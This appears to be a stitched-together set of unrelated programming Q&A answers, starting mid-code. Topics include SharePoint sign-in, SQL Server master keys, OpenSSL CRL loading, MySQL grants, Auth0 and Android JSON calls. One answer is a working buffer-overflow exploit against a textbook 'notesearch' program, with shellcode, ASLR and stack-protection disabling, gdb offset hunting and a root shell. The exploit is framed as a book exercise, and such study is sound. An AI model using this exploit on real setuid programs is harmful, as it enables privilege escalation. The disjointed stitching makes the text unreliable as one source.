sharePointProperties.getEndpoint() + "</a:Address></a:EndpointReference></wsp:AppliesTo><t:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</t:KeyType> <t:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</t:RequestType> <t:TokenType>urn:oasis:names:tc:SAML:1.0:assertion</t:TokenType></t:RequestSecurityToken></s:Body></s:Envelope>"; return String.format(envelopeTemplate, sharePointProperties.getUsername(), sharePointProperties.getPassword()); } @Cacheable(Const.CACHE_NAME_COOKIE) public List<String> getSignInCookies(String securityToken) throws TransformerException, URISyntaxException { RequestEntity<String> requestEntity = new RequestEntity<>(securityToken, HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/_forms/default.aspx?wa=wsignin1.0")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); HttpHeaders headers = responseEntity.getHeaders(); List<String> cookies = headers.get("Set-Cookie"); if (CollectionUtils.isEmpty(cookies)) { throw new SharePointSignInException("Unable to sign in: no cookies returned in response"); } log.debug("SharePoint respond with cookies: {}", Joiner.on(", ").join(cookies)); return cookies; } public String getFormDigestValue(List<String> cookies) throws IOException, URISyntaxException, TransformerException, JSONException { MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("Accept", "application/json;odata=verbose"); headers.add("X-ClientService-ClientTag", "SDK-JAVA"); RequestEntity<String> requestEntity = new RequestEntity<>(headers, HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/_api/contextinfo")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); JSONObject json = new JSONObject(responseEntity.getBody()); return json.getJSONObject("d") .getJSONObject("GetContextWebInformation") .getString("FormDigestValue"); } 
public Long parseExecutionDateTime(Date dateTime) { if (dateTime == null) return null; final Calendar cal = Calendar.getInstance(); cal.setTime(dateTime); cal.set(Calendar.HOUR_OF_DAY, 0); cal.set(Calendar.MINUTE, 0); cal.set(Calendar.SECOND, 0); cal.set(Calendar.MILLISECOND, 0); return cal.getTime().getTime(); } } Methods from this service should be called as follows: package com.waveaccess.someproject.commons.service; import com.google.common.base.Joiner; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpMethod; import org.springframework.http.RequestEntity; import org.springframework.http.ResponseEntity; import org.springframework.stereotype.Service; import org.springframework.util.LinkedMultiValueMap; import org.springframework.util.MultiValueMap; import org.springframework.web.client.RestTemplate; import java.net.URI; import java.util.Date; import java.util.List; /** * @author Maksim Kanev */ @Service public class SharePointService { private static final Logger log = LoggerFactory.getLogger(SharePointService.class); @Autowired private SharePointServiceCached serviceCached; @Autowired private RestTemplate restTemplate; public String performHttpRequest(HttpMethod method, String path) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); RequestEntity<String> requestEntity = new RequestEntity<>(headers, method, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } public String performHttpRequest(String 
path, String json, boolean isUpdate, boolean isWithDigest) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); String formDigestValue = serviceCached.getFormDigestValue(cookies); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("Content-type", "application/json;odata=verbose"); if (isWithDigest) { headers.add("X-RequestDigest", formDigestValue); } if (isUpdate) { headers.add("X-HTTP-Method", "MERGE"); headers.add("IF-MATCH", "*"); } RequestEntity<String> requestEntity = new RequestEntity<>(json, headers, HttpMethod.POST, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } public String attachFile(String path, byte[] file) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); String formDigestValue = serviceCached.getFormDigestValue(cookies); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("X-RequestDigest", formDigestValue); headers.add("content-length", String.valueOf(file.length)); RequestEntity<byte[]> requestEntity = new RequestEntity<>(file, headers, HttpMethod.POST, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } } Configuration of XPathExpressionFactoryBean: package com.waveaccess.someproject.commons.config; import 
com.waveaccess.someproject.commons.config.properties.SharePointProperties; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.xml.xpath.XPathExpressionFactoryBean; import java.util.HashMap; import java.util.Map; /** * @author Maksim Kanev */ @Configuration @EnableConfigurationProperties({SharePointProperties.class}) public class SharePointConfiguration { @Bean public XPathExpressionFactoryBean securityTokenExpressionFactoryBean() { XPathExpressionFactoryBean xPathExpressionFactoryBean = new XPathExpressionFactoryBean(); xPathExpressionFactoryBean.setExpression("/S:Envelope/S:Body/wst:RequestSecurityTokenResponse/wst:RequestedSecurityToken/wsse:BinarySecurityToken"); Map<String, String> namespaces = new HashMap<>(); namespaces.put("S", "http://www.w3.org/2003/05/soap-envelope"); namespaces.put("wsse", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"); namespaces.put("wsu", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"); namespaces.put("wsa", "http://www.w3.org/2005/08/addressing"); namespaces.put("wst", "http://schemas.xmlsoap.org/ws/2005/02/trust"); xPathExpressionFactoryBean.setNamespaces(namespaces); return xPathExpressionFactoryBean; } } And finally SharePointProperties: package com.waveaccess.someproject.commons.config.properties; import org.springframework.boot.context.properties.ConfigurationProperties; /** * @author Maksim Kanev */ @ConfigurationProperties("sharepoint") public class SharePointProperties { private String username; private String password; public String getUsername() { return username; } public void setUsername(String username) { this.username = username; } public String getPassword() { return password; } public void setPassword(String password) { this.password = password; } }
TL;DR: It is normal for cipher text to be different on each encryption, all other things being equal. I believe this is intentional "randomisation" of the output in order not to make password guessing easier. (The signature, however, will always be the same.)

If you look at your DMK backup files side by side, you will see that the first 40-60 bytes have an almost identical structure (the same amounts of spaces in the same places, for instance); only some data differ. This is a header where the salt, among other things, is located. Salt doesn't need to be hidden; it only needs to be random.

Now, about the errors you receive during the restore (which, for some reason, you haven't shared). I created a test environment and two DMK backups just as you did. In addition, to make things a bit more realistic, I created a certificate without specifying an encryption password:

create certificate [TestCert] authorization [dbo]
with subject = 'DMK Restore Test certificate';

This means that the certificate private key will be encrypted using the DMK, so now we have some encrypted data. If I try to restore the DMK from its first backup:

restore master key from file = 'D:\Tests\Key1.dmk'
decryption by password = 'asdfdgkjh98hvio'
encryption by password = 'nmbneknfownoih';

SSMS outputs the following message (not an error, mind you):

The old and new master keys are identical. No data re-encryption is required.

The key is currently open, because that's the default behaviour, and no differences are detected. Trying to create a signature using our cert proves that data encrypted by the DMK (the cert's private key) is accessible:

select signbycert(cert_id('TestCert'), 'ASDfgh');

(You will see some varbinary(128) output for the above.)
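The salt-randomised output described above is easy to reproduce outside SQL Server. The sketch below is plain Python, not SQL Server's actual on-disk format: the same password is protected twice with a fresh random salt each time, so the stored bytes differ on every run, yet both blobs still verify against the same password.

```python
import hashlib
import os

def protect(password: bytes) -> bytes:
    # Fresh random salt each time, stored in the clear as a "header",
    # loosely analogous to the salt in the DMK backup header.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)
    return salt + digest

def verify(password: bytes, blob: bytes) -> bool:
    salt, digest = blob[:16], blob[16:]
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000) == digest

blob1 = protect(b"asdfdgkjh98hvio")
blob2 = protect(b"asdfdgkjh98hvio")
print(blob1 != blob2)                     # True: same password, different bytes
print(verify(b"asdfdgkjh98hvio", blob1))  # True
print(verify(b"asdfdgkjh98hvio", blob2))  # True
```

The point is that the randomness lives entirely in the clear-text header; it buys unpredictability of the stored bytes without itself being a secret.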
However, if I turn off the key auto-opening by removing its copy from master, which is a common scenario when you restore a database backup:

alter master key drop encryption by service master key;

and then try to restore using the same restore master key statement as above, there will be an error, indeed:

Msg 15329, Level 16, State 30, Line 1
The current master key cannot be decrypted. If this is a database master key, you should attempt to open it in the session before performing this operation. The FORCE option can be used to ignore this error and continue the operation but the data encrypted by the old master key will be lost.

The keys (the existing one and the one being restored) are still the same, but this time SQL Server can't see it: the DMK is closed. Trying to sign using the cert returns NULL for the same reason. Note the mention of the FORCE option. If I add it:

restore master key from file = 'D:\Tests\Key1.dmk'
decryption by password = 'asdfdgkjh98hvio'
encryption by password = 'nmbneknfownoih'
force;

the result is, again, just an informational message:

The current master key cannot be decrypted. The error was ignored because the FORCE option was specified.

The only thing left to get your data back is to either explicitly open the DMK, or turn its auto-opening back on:

open master key decryption by password = 'nmbneknfownoih';
go
-- And if you need it to be always available in the future
alter master key add encryption by service master key;
go

After that, certificate signing starts to work again (and will return exactly the same binary data as it did the first time).
The error I am getting is:

CRL Error d06b08e : error:0D06B08E:lib(13):func(107):reason(142) : a_d2i_fp.c : 246

Why is d2i_X509_CRL_bio returning NULL, and how do I fix it?

The problem is the call below. http_reply->payload is binary data with embedded NULs, so you need to provide an explicit length, and not use -1:

bp_bio = BIO_new_mem_buf(http_reply->payload, -1);

I'm guessing if you change -1 to 1163154, then it will work as expected:

$ ls -al ss.crl
-rw-r--r-- ... 1163154 Nov 17 04:06 ss.crl

Also see the BIO_new_mem_buf man page:

BIO_new_mem_buf() creates a memory BIO using len bytes of data at buf, if len is -1 then the buf is assumed to be nul terminated and its length is determined by strlen. The BIO is set to a read only state and as a result cannot be written to...

Here's how you can verify OpenSSL's side of things.

Fetch CRL

$ wget -O ss.crl 'http://ss.symcb.com/ss.crl'
--2016-11-17 07:15:49-- http://ss.symcb.com/ss.crl
Resolving ss.symcb.com (ss.symcb.com)... 23.4.181.163 ...
Connecting to ss.symcb.com (ss.symcb.com)|23.4.181.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/pkix-crl]
Saving to: ‘ss.crl’
ss.crl [ <=> ] 1.11M 3.75MB/s in 0.3s

Verify CRL

Use Peter Gutmann's dumpasn1 to see if it's well formed:

$ dumpasn1 ss.crl
  0 1163149: SEQUENCE {
  5 1162868:   SEQUENCE {
 10       1:     INTEGER 1
 13      13:     SEQUENCE {
 15       9:       OBJECT IDENTIFIER sha256WithRSAEncryption (1 2 840 113549 1 1 11)
 26       0:       NULL
            :       }
 28     126:     SEQUENCE {
 30      11:       SET {
 32       9:         SEQUENCE {
 34       3:           OBJECT IDENTIFIER countryName (2 5 4 6)
 39       2:           PrintableString 'US'
            :           }
            :         }
 43      29:       SET {
 45      27:         SEQUENCE {
 47       3:           OBJECT IDENTIFIER organizationName (2 5 4 10)
 52      20:           PrintableString 'Symantec Corporation'
            :           }
            :         }
 74      31:       SET {
 76      29:         SEQUENCE {
 78       3:           OBJECT IDENTIFIER organizationalUnitName (2 5 4 11)
 83      22:           PrintableString 'Symantec Trust Network'
            :           }
            :         }
...
1162878 13: SEQUENCE { 1162880 9: OBJECT IDENTIFIER : sha256WithRSAEncryption (1 2 840 113549 1 1 11) 1162891 0: NULL : } 1162893 257: BIT STRING : A6 4F 77 4E 4C EB E2 6A 13 28 02 25 6C D8 41 56 : 71 35 19 02 47 53 44 B0 F1 6A CB 37 61 EC 1F 20 : 56 08 97 0C 58 33 7F 40 7E 87 29 0B 47 35 28 8B : 1B 2A 0D 1F C5 1F F8 03 E8 6A FF E7 D3 BF C3 69 : 8D 3D BF 8D 1A 44 4A A2 2A 5A C3 1C 8E 5F 0C 1F : 24 3E 49 99 8E F3 98 CB BD 3C EA D4 A0 A2 3C E6 : D9 10 FE F2 C0 27 97 75 25 58 27 84 F0 1B 90 A3 : 0D 55 D7 EA D3 AE 0C BC BB F3 D7 77 CD 3A 0D 19 : [ Another 128 bytes skipped ] : } 0 warnings, 0 errors. Load CRL $ cat test-crl.c #include <stdio.h> #include <openssl/x509.h> #include <openssl/bio.h> int main(int argc, char* argv[]) { BIO* bio = BIO_new_file("ss.crl", "r"); if(bio == NULL) { fprintf(stderr, "Failed to create BIO\n"); exit(1); } X509_CRL* crl = d2i_X509_CRL_bio(bio, NULL); if(crl == NULL) { fprintf(stderr, "Failed to create CRL\n"); exit(1); } fprintf(stdout, "Loaded CRL\n"); X509_CRL_free(crl); BIO_free(bio); return 0; } $ gcc -I /usr/local/include test-crl.c /usr/local/lib/libcrypto.a -o test-crl.exe $ ./test-crl.exe Loaded CRL You can usually make sense of the error codes with the openssl errstr utility: $ openssl errstr 0xd06b08e error:0D06B08E:asn1 encoding routines:asn1_d2i_read_bio:not enough data The only time I have seen it fail is when decoding FIPS error codes if the openssl utility is not configured for FIPS. http_reply->payload You should verify your http_reply->payload is the same data provided by other tools, like wget. Below shows the first and last 64 bytes when fetching with wget. $ wget -O ss.crl 'http://ss.symcb.com/ss.crl' --2016-11-17 14:12:20-- http://ss.symcb.com/ss.crl Resolving ss.symcb.com (ss.symcb.com)... 23.4.181.163 ... Connecting to ss.symcb.com (ss.symcb.com)|23.4.181.163|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/pkix-crl] Saving to: ‘ss.crl’ ... 
$ head -c 64 ss.crl | xxd -g 1 0000000: 30 83 11 bf 8d 30 83 11 be 74 02 01 01 30 0d 06 0....0...t...0.. 0000010: 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b .*.H........0~1. 0000020: 30 09 06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 0...U....US1.0.. 0000030: 03 55 04 0a 13 14 53 79 6d 61 6e 74 65 63 20 43 .U....Symantec C $ tail -c 64 ss.crl | xxd -g 1 0000000: 16 2a d7 ab 7c e2 42 0e 95 32 14 fe f1 0d b8 6d .*..|.B..2.....m 0000010: a4 9b ec 17 fb b3 db d2 0b 9d 83 a8 a7 79 5b d5 .............y[. 0000020: e9 56 4d aa 65 e3 3b f5 ad 79 58 c7 0a d4 00 3b .VM.e.;..yX....; 0000030: f8 c6 73 df 9e c0 54 7d 57 05 2d 7f cb 5c bc 74 ..s...T}W.-..\.t
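You can see why -1 is fatal here without touching OpenSSL at all. Below is a rough Python sketch using the first 32 bytes of the CRL transcribed from the xxd output above: a strlen-style length stops at the first embedded NUL (here, the 05 00 ASN.1 NULL inside the signature AlgorithmIdentifier), far short of the real length.

```python
# First 32 bytes of ss.crl, transcribed from the xxd output above.
der = bytes.fromhex(
    "308311bf8d308311be74020101300d06"
    "092a864886f70d01010b0500307e310b"
)

def c_strlen(buf: bytes) -> int:
    """The length strlen() would report: bytes before the first NUL."""
    i = buf.find(0)
    return len(buf) if i < 0 else i

print(len(der))       # 32 -- the real length of this fragment
print(c_strlen(der))  # 27 -- where a strlen()-based length gives up
```

On the full 1163154-byte file the discrepancy is the same in kind, only larger, which is exactly why d2i_X509_CRL_bio reports "not enough data".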
I was able to modify your sample code to get it to work in 64-bit with the notesearch program from the book. Many of the protections in modern OSes and build tools must be turned off for this to work, but it is obviously for educational purposes, so that's reasonable for now. First, turn off ASLR on your system with: echo 0 > /proc/sys/kernel/randomize_va_space This must be done as root, and it won't work with sudo, since the sudo will only apply to the echo command, not the redirection. Just sudo -i first, then run it. Next, the notesearch program must be compiled with two important safety protections disabled. By default, your program would be built with stack canaries for the detection of buffer overflows and also a non-executable stack, since there's usually no legitimate reason to run code from the stack. gcc -g -z execstack -fno-stack-protector -o notesearch notesearch.c Now, the exploit code: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> char shellcode[]= "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53" "\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; int main(int argc, char *argv[]) { char *command, *buffer; command = (char *) malloc(200); bzero(command, 200); // zero out the new memory strcpy(command, "./notesearch \'"); // start command buffer buffer = command + strlen(command); // set buffer at the end memset(buffer, 'A', 0x78); // Fill buffer up to return address *(unsigned long long*)(buffer+0x78) = 0x7fffffffe1c0; memcpy(buffer, shellcode, sizeof(shellcode)-1); strcat(command, "\'"); system(command); // run exploit } This problem can be narrowed down to a simple return address overwrite, so no NOP sled is required. Additionally, the shellcode from your original post was for 32-bit only. The 64-bit shellcode I used is from http://shell-storm.org/shellcode/files/shellcode-806.php. The big question: Where did 0x78 and 0x7fffffffe1c0 come from? 
I started out with a number larger than 0x78 since I didn't know what to use. I just guessed 175 since it's bigger than the target buffer. So the first iteration had these lines: memset(buffer, 'A', 175); // Overflow buffer //*(unsigned long long*)(buffer+???) = ???; Now to try that out. Note that, while testing, I used a non-setuid version of notesearch to facilitate successful core dumps. ulimit -c unlimited gcc myexp.c ./a.out The notesearch program crashed and created a core file: deb82:~/notesearch$ ./a.out [DEBUG] found a 15 byte note for user id 1000 -------[ end of note data ]------- Segmentation fault (core dumped) deb82:~/notesearch$ Running gdb ./notesearch core shows: Program terminated with signal SIGSEGV, Segmentation fault. #0 0x00000000004008e7 in main (argc=2, argv=0x7fffffffe2c8) at notesearch.c:35 35 } (gdb) Good. It crashed. Why? (gdb) x/1i $rip => 0x4008e7 <main+158>: retq (gdb) x/1gx $rsp 0x7fffffffe1e8: 0x4141414141414141 (gdb) It's trying to return to our controlled address (all A's). Good. What offset from our controlled string (searchstring) points to the return address? (gdb) p/x (unsigned long long)$rsp - (unsigned long long)searchstring $1 = 0x78 (gdb) So now we try again, with these changes: memset(buffer, 'A', 0x78); // Fill buffer up to return address *(unsigned long long*)(buffer+0x78) = 0x4242424242424242; Again, we get a core dump. Analyzing it shows: Program terminated with signal SIGSEGV, Segmentation fault. #0 0x00000000004008e7 in main (argc=2, argv=0x7fffffffe318) at notesearch.c:35 35 } (gdb) x/1i $rip => 0x4008e7 <main+158>: retq (gdb) x/1gx $rsp 0x7fffffffe238: 0x4242424242424242 (gdb) Good, we controlled the return address more surgically. Now, what do we want to put there instead of a bunch of B's? Search a reasonable range of stack for our shellcode (0xbb48c031 is a DWORD corresponding to the first 4 bytes in the shellcode buffer). Just mask off the lower 3 digits and start at the beginning of the page. 
(gdb) find /w 0x7fffffffe000,$rsp,0xbb48c031 0x7fffffffe1c0 1 pattern found. (gdb) So our shellcode exists on the stack at 0x7fffffffe1c0. This is our desired return address. Updating the code with this information, and making notesearch setuid root again, we get: deb82:~/notesearch$ whoami user deb82:~/notesearch$ ./a.out [DEBUG] found a 15 byte note for user id 1000 -------[ end of note data ]------- # whoami root # The code I provided may work as is on your setup, but most likely, you'll probably need to follow a similar path to get the correct offsets to use.
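For reference, the payload layout used above (filler up to the saved return address, shellcode at the front of the buffer, then the overwritten return address) can be reproduced in a short Python sketch. The offset and address are the values found with gdb above and will differ on other setups.

```python
import struct

# 64-bit execve("/bin/sh") shellcode from shell-storm (shellcode-806).
shellcode = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53"
             b"\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

RET_OFFSET = 0x78          # distance from searchstring to the saved return address
RET_ADDR = 0x7fffffffe1c0  # stack address where the shellcode was found

payload = bytearray(b"A" * RET_OFFSET)   # fill buffer up to the return address
payload[:len(shellcode)] = shellcode     # shellcode at the start of the buffer
payload += struct.pack("<Q", RET_ADDR)   # little-endian 64-bit return address

print(len(payload))        # 128 (0x78 bytes of filler + 8-byte address)
print(payload[-8:].hex())  # c0e1ffffff7f0000
```

Note the address is packed little-endian, which is why the gdb examination of $rsp shows the bytes in "reversed" order relative to how the address is written.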
From AWS documentation:

Two common causes of connection failures to a new DB instance are:

1. The DB instance was created using a security group that does not authorize connections from the device or Amazon EC2 instance where the MySQL application or utility is running. If the DB instance was created in a VPC, it must have a VPC security group that authorizes the connections. If the DB instance was created outside of a VPC, it must have a DB security group that authorizes the connections.

2. The DB instance was created using the default port of 3306, and your company has firewall rules blocking connections to that port from devices in your company network. To fix this failure, recreate the instance with a different port.

You can use SSL encryption on connections to an Amazon RDS MySQL DB instance. For information, see Using SSL with a MySQL DB Instance.

While I would confirm that causes 1 and 2 are not the case before proceeding, once you've discounted the obvious, check your permissions by accessing the MySQL server directly and typing:

SHOW GRANTS FOR 'myuser'@'localhost';

If something relating to SSL shows up, then one of two things is happening:

1. You are not properly including an SSL certificate in your code.
2. You are not including the correct part of the SSL certificate in your code.

Follow this tutorial and ensure you are using the right SSL certificate. You should be able to rebuild your certificate and connect successfully. From the link above, if you have SSL encryption, your end code should look something like this:

using (MySqlConnection connection = new MySqlConnection(
    "database=test;user=sslclient;" +
    "CertificateFile=H:\\bzr\\mysql-trunk\\mysql-test\\std_data\\client.pfx;" +
    "CertificatePassword=pass;" +
    "SSL Mode=Required"))
{
    connection.Open();
}

Where the \path\to\client.pfx is the path to your .pfx file.
If nothing shows up or you receive the error explained in the comments Error Code: 1141 There is no such grant defined for user '***' on host '***.***.***', you can check your user permissions another way. On the MySQL shell: select * from mysql.user where User='<myuser>'; If you see a wildcard in the host, it means that a user can log in from anywhere. While horribly insecure, this may be what you're looking for. You can then go back and use SHOW GRANTS mirroring the host name exactly as it shows up in your return query. Please note that you may see something like this: Host ----- %.myhostname.tld If your domain is subdomain.myhostname.tld then this wildcard matches, and you would use: SHOW GRANTS FOR 'myuser'@'%.myhostname.tld'; If you don't have a user with any matching permissions You will be unable to connect to your MySQL instance at all. You will need to create a user that matches your host. CREATE USER 'myuser'@'myhost' IDENTIFIED BY '<password>'; GRANT ALL ON <database>.* TO 'myuser'@'myhost'; If you want SSL: GRANT ALL ON <database>.* TO 'myuser'@'myhost' REQUIRE SSL;
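MySQL's % and _ host wildcards follow LIKE semantics. If you want to check locally which of your grant rows would match a given client host, a rough approximation (my own translation to fnmatch globs; it ignores edge cases such as bracket characters in patterns) looks like this:

```python
import fnmatch

def mysql_host_matches(pattern: str, host: str) -> bool:
    # MySQL LIKE semantics: % matches any run of characters, _ exactly one.
    translated = pattern.replace("%", "*").replace("_", "?")
    return fnmatch.fnmatchcase(host.lower(), translated.lower())

print(mysql_host_matches("%.myhostname.tld", "subdomain.myhostname.tld"))  # True
print(mysql_host_matches("%.myhostname.tld", "myhostname.tld"))            # False
print(mysql_host_matches("%", "client.anywhere.example"))                  # True
```

Note the second case: %.myhostname.tld requires the literal dot, so the bare domain itself does not match that grant row.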
If you haven't done so, you should follow this article (React Login with Auth0) to implement the authentication on your React application. If you have already tried to follow it, update your question with the specific issues you faced. Even though you do not currently need SSO, the actual implementation of the authentication in your application will not vary much; by using Auth0, enabling SSO across your apps is mostly a matter of enabling configuration switches. Finally, for a full reference with all the theory behind the security-related aspects of your exact scenario, check: Auth0 Architecture Scenarios: SPA + API

Update: The full scenario I linked to covers the most comprehensive situation, where an API is accessed by a multitude of client applications that may even be developed by third parties that do not own the protected API, but want to access the data behind it. It does this by leveraging recent features that are currently only available in the US region and that, at a very high level, can be described as an OAuth 2.0 authorization server delivered as a service. Your particular scenario is simpler: both the API and the client application are under the control of the same entity, so you have another option.

Option 1 - Leverage the API authorization through Auth0 (US region only, for now)

In this situation your client application, at authentication time, would receive an id_token that would be used to know the currently authenticated user, and would also receive an access_token that could be used to call the API on behalf of the authenticated user. This makes a clear separation between the client application and the API; the id_token is for client application usage and the access_token for API usage. It has the benefit that authorization is clearly separated from authentication, and you can have very fine-grained control over authorization decisions by controlling the scopes included in the access token.
Option 2 - Authenticate in the client application and API in the same way

You can deploy your client application and API separately, but still treat them from a conceptual perspective as the same application (you would have one client configured in Auth0 representing both the client side and the API). This has the benefit that you could use the id_token that is obtained after authentication completes both to know who the user is on the client side and as the mechanism to authenticate each API request. You would have to configure the Feathers API to validate the Auth0 id_token as an accepted token for accessing the API. This means that you don't use any Feathers-based authentication on the API; that is, you just accept tokens issued by Auth0 to your application as the way to validate access.
You need to ensure your XML nodes are in alphabetical order:

<?xml version="1.0" encoding="utf-8" ?>
<KioskSettings xmlns="http://schemas.datacontract.org/2004/07/Proxies" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
  <EncryptionKey>abcd</EncryptionKey>
  <HeartBeatInterval>1</HeartBeatInterval>
  <ID>20198</ID>
  <ServerURL></ServerURL>
</KioskSettings>

Serialize a KioskSettings object with the following code, and ensure your XML takes the same form:

public static string DataContractSerializeObject<T>(T objectToSerialize)
{
    using (MemoryStream memStm = new MemoryStream())
    {
        var serializer = new DataContractSerializer(typeof(T));
        serializer.WriteObject(memStm, objectToSerialize);
        memStm.Seek(0, SeekOrigin.Begin);
        using (var streamReader = new StreamReader(memStm))
        {
            string result = streamReader.ReadToEnd();
            return result;
        }
    }
}

If you need to preserve a specific order then specify the DataMember attribute on your class properties - Data Member Order e.g.

[DataContract]
public class KioskSettings
{
    [DataMember(Order = 1)]
    public string ID { get; set; }

    [DataMember(Order = 2)]
    public int HeartBeatInterval { get; set; }

    [DataMember(Order = 3)]
    public string ServerURL { get; set; }

    [DataMember(Order = 4)]
    public string EncryptionKey { get; set; }
}
If I understand your question correctly, what you're asking is impossible. I'm no cryptography expert, but I'll try to explain the best I can:

Let e(x) be a function that encrypts a given x.
Let d(x) be a function that decrypts a given x.
Let x be some string.

Just think about this for a second. If e(x) takes x and encrypts it, then there must exist a d(x) that will decrypt our ciphertext and give us our original text back. Otherwise, our encryption algorithm is useless! If the size of the result of e(x) were capped regardless of the input size, then it would be impossible for d(x) to exist. This is because there is only so much data that can be encoded in a text of a given length (128 possible values per byte in ASCII). So naturally, as the size of the input message to e(x) grows, the size of the cipher text (the result of e(x)) must also grow at a similar rate.

If you want to reduce the size of the output text, you can look into using compression. I don't have much experience with this personally, but you may want to look into something like GZipStream. Also, as Luke suggested, you may be looking for a hashing algorithm, which will make your text a fixed size. For C#, look into HashAlgorithm.
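Both halves of this argument can be demonstrated with a toy example: a reversible XOR "cipher" whose output necessarily matches the input length, versus a hash whose output is fixed but one-way. This is illustrative Python only, not a scheme for production use.

```python
import hashlib
from itertools import cycle

def xor_cipher(key: bytes, data: bytes) -> bytes:
    # e(x) and d(x) are the same operation here; nothing can be discarded,
    # so the output is exactly as long as the input.
    return bytes(a ^ b for a, b in zip(data, cycle(key)))

key = b"secret"
short, long_ = b"hi", b"x" * 10_000

assert xor_cipher(key, xor_cipher(key, long_)) == long_  # d(e(x)) == x
print(len(xor_cipher(key, short)), len(xor_cipher(key, long_)))  # 2 10000

# A hash is fixed-size no matter the input, but no d(x) exists for it:
print(len(hashlib.sha256(short).digest()), len(hashlib.sha256(long_).digest()))  # 32 32
```

The fixed-size hash is only possible because it throws information away, which is exactly why it cannot be decrypted.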
I believe the below code will give you the feasible solution for your problem, Paste the below code in your Java file private static JSONObject get(Context ctx, String sUrl) { HttpURLConnection connection = null; try { URL url = new URL(sUrl); connection = (HttpURLConnection) url.openConnection(); connection.setRequestProperty("Content-Type", "application/json"); connection.setRequestProperty("Accept", "application/json"); connection.setRequestProperty("Authorization", "Basic " + encodedAuthentication); connection.setRequestProperty("Accept-Charset", "utf-8,*"); Log.d("Get-Request", url.toString()); try { BufferedReader bufferedReader = new BufferedReader( new InputStreamReader(connection.getInputStream())); StringBuilder stringBuilder = new StringBuilder(); String line; while ((line = bufferedReader.readLine()) != null) { stringBuilder.append(line).append("\n"); } bufferedReader.close(); Log.d("Get-Response", stringBuilder.toString()); return new JSONObject(stringBuilder.toString()); } finally { connection.disconnect(); } } catch (Exception e) { Log.e("ERROR", e.getMessage(), e); return null; } } private static String buildSanitizedRequest(String url, Map<String, String> mapOfStrings) { Uri.Builder uriBuilder = new Uri.Builder(); uriBuilder.encodedPath(url); if (mapOfStrings != null) { for (Map.Entry<String, String> entry : mapOfStrings.entrySet()) { Log.d("buildSanitizedRequest", "key: " + entry.getKey() + " value: " + entry.getValue()); uriBuilder.appendQueryParameter(entry.getKey(), entry.getValue()); } } String uriString; try { uriString = uriBuilder.build().toString(); // May throw an // UnsupportedOperationException } catch (Exception e) { Log.e("Exception", "Exception" + e); } return uriBuilder.build().toString(); } And your Json calling part should look like this public static JSONObject exampleGetMethod(Context ctx, String sUrl,String yourName) throws JSONException, IOException { Map<String, String> request = new HashMap<String, String>(); 
request.put("yourName", yourName);
    sUrl = sUrl + "yourApiName";
    return get(ctx, buildSanitizedRequest(sUrl, request));
}

In the above code, yourName is the input parameter and sUrl is the API URL plus the API name. Finally, when you call exampleGetMethod(Context, String, String), you will get the JSON response of the requested URL.

If you want to get a specific array value from the response, you need logic along these lines:

JSONArray a = response.getJSONArray("contacts");
JSONObject needyArray;
for (int i = 0; i < a.length(); i++) {
    if (a.getJSONObject(i).optString("name").equals("kumar")) {
        needyArray = a.getJSONObject(i);
        break;
    }
}

Now the needyArray JSONObject variable holds the data of the particular person (kumar, in this example).
If you are developing a client app, you can refer to the code below to acquire the token:

string authority = "https://login.microsoftonline.com/xxxx.onmicrosoft.com";
string resource = "https://graph.windows.net";
string clientId = "";
string userName = "";
string password = "";

UserPasswordCredential userPasswordCredential = new UserPasswordCredential(userName, password);
AuthenticationContext authContext = new AuthenticationContext(authority);
